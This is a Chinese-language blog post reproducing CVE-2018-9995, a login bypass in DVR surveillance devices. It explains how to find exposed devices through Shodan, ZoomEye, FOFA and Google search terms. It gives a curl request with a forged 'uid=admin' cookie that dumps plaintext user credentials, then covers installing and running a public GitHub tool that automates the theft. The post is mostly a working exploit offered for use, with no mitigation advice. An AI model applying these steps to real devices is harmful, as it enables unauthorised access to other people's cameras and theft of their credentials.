DVR登录绕过漏洞复现(CVE-2018-9995)

DVR登录绕过(CVE-2018-9995)

欢迎进群交流技术: 363034250

前言

前两天关于DVR登录绕过的漏洞文章就有了,最近看到了它的POC,是阿根廷一个叫费尔南德斯的大牛在4.30更新在其博客上的,直接能够获取多种DVR的明文凭证(登录密码),于是我也尝试了一下,屡试不爽…

漏洞复现

感觉问题在,这些DVR的cookie都好简单,”uid=admin”,然后凭证都是明文…

获取有可能存在漏洞的设备

使用shodan,zoomeye,fofa,google等搜索引擎,可以查到;

搜索关键字:”/longin.rsp”或者”GNU rsp/1.0”,如图:

获取凭证

条件:存在device.rsp页面并可访问

使用curl命令:

curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

这样就获取到了密码

登录

直接使用密码登录即可:

登录成功:

工具使用

这个阿根廷的大牛写了个py工具,直接获取明文密码

工具发布在了github上:https://github.com/ezelf/CVE-2018-9995_dvr_credentials

工具安装

git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
cd CVE-2018-9995_dvr_credentials
pip install -r requirements.txt

使用帮助

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining Exposed credentials

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81

效果图:

参考链接

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html